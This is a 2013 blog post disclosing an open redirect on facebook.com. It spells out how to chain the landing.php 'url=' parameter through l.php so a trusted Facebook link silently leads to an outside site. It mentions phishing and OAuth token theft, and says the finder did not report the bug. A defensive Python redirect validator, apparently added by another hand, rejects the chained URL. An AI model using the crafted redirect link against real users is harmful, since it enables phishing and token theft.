Monday, 18 November 2013

Facebook open URL redirection vulnerability


Algerian security researcher "Asesino04" (The Black Devils) discovered an open URL redirection vulnerability in Facebook that allowed an attacker to make a facebook.com link redirect to any website without Facebook's "Leave Facebook" warning.

This kind of vulnerability is used to trick the victim into clicking a trusted-looking link that is designed to lead the victim to a malicious website.

This vulnerability is especially dangerous when it is used to redirect a third-party application: it can allow the attacker to steal the access token (an OAuth bug), which is very critical.


The finder of the exploit, who is also a member of the 1337DAY team, did not report the bug to Facebook.


The vulnerability exists on the page where anyone can download the iOS or Android SDK.
You go to :
and you copy the link of "Download SDK"
# you keep only this 
https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=

# then you add to it 
https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F

# so it becomes:

https://www.facebook.com/campaign/landing.php?campaign_id=282184128580929&placement=Android_SDK&url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F
Then it redirects to:
https://www.facebook.com/campaign/landing.php?url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F
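To make the failing check concrete, here is an added example (my own code, not Facebook's) of how a redirect parameter such as `url=` should be validated server-side. It allows only relative paths or the site's own hosts, and it refuses a same-site URL whose query string itself carries an off-site URL, which is exactly the landing.php -> l.php chain shown above. `OWN_HOSTS`, `validate_redirect` and `redirect_param` are names I made up for this illustration; `POC_URL` is the chained URL from the post.

```python
from urllib.parse import urlsplit, parse_qsl

# Assumption: the hosts the application considers its own. A silent redirect
# may only land on these; anything else must be refused (or sent through an
# explicit "you are leaving this site" page).
OWN_HOSTS = {"www.facebook.com", "facebook.com"}

# The chained URL from the post, used here as the test input.
POC_URL = ("https://www.facebook.com/campaign/landing.php"
           "?campaign_id=282184128580929&placement=Android_SDK"
           "&url=https://www.facebook.com/l.php?u=http%3A%2F%2F1337day.com%2F")


def redirect_param(full_url, name="url"):
    """Return the named query parameter as the server sees it (percent-decoded),
    or None if absent. parse_qsl splits each pair on the first '=' only, so a
    value that itself contains '?' or '=' survives intact."""
    for key, val in parse_qsl(urlsplit(full_url).query, keep_blank_values=True):
        if key == name:
            return val
    return None


def _external_host(value, own_hosts):
    """Return the host of `value` if it is an absolute http(s) URL pointing
    off-site, else None."""
    try:
        parts = urlsplit(value)
    except ValueError:          # e.g. malformed IPv6 literal
        return None
    if parts.scheme.lower() not in ("http", "https"):
        return None
    host = (parts.hostname or "").lower()
    return host if host and host not in own_hosts else None


def validate_redirect(value, own_hosts=OWN_HOSTS):
    """Classify the value of a redirect parameter.

    Returns (verdict, reason). verdict is 'allow' for a same-site target that
    may be followed silently, or 'reject' for anything else: non-web schemes,
    off-site hosts (including protocol-relative //host and user@host forms),
    and same-site URLs whose own query string carries an off-site URL, i.e.
    a hop through a second redirector like landing.php -> l.php.
    """
    value = value.strip()
    try:
        parts = urlsplit(value)
    except ValueError:
        return "reject", "unparseable URL"

    scheme = parts.scheme.lower()
    if scheme not in ("", "http", "https"):
        return "reject", "unsupported scheme %r" % scheme

    host = (parts.hostname or "").lower()
    if host == "":
        # No host at all: accept only an ordinary relative path.
        # "//host/..." does carry a host, so it never reaches this branch.
        if scheme == "" and value.startswith("/") and not value.startswith("//"):
            return "allow", "relative path"
        return "reject", "no usable host"

    if host not in own_hosts:
        return "reject", "external host %r" % host

    # Same-site target: refuse it if any query value is itself an off-site URL,
    # which is how the chained redirect in the post slips past the warning.
    for key, qval in parse_qsl(parts.query, keep_blank_values=True):
        if _external_host(qval, own_hosts):
            return "reject", "nested external redirect via %r" % key
    return "allow", "same-site target"


if __name__ == "__main__":
    for candidate in ("/docs/android-sdk", redirect_param(POC_URL), "//attacker.example/"):
        print(candidate, "->", validate_redirect(candidate))
```

The nested-URL check is deliberately conservative: it also rejects harmless same-site pages that happen to take a URL in a query parameter. In a real deployment you would narrow it to the paths that actually redirect, but the important point is that "the target is on our own host" is not enough when that host also serves a redirector.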

:)
The bug has full disclosure:
http://packetstormsecurity.com/files/124059/Facebook-Open-Redirection.html
http://exploitsdownload.com/exploit/na/facebook-open-redirection

A proof of concept: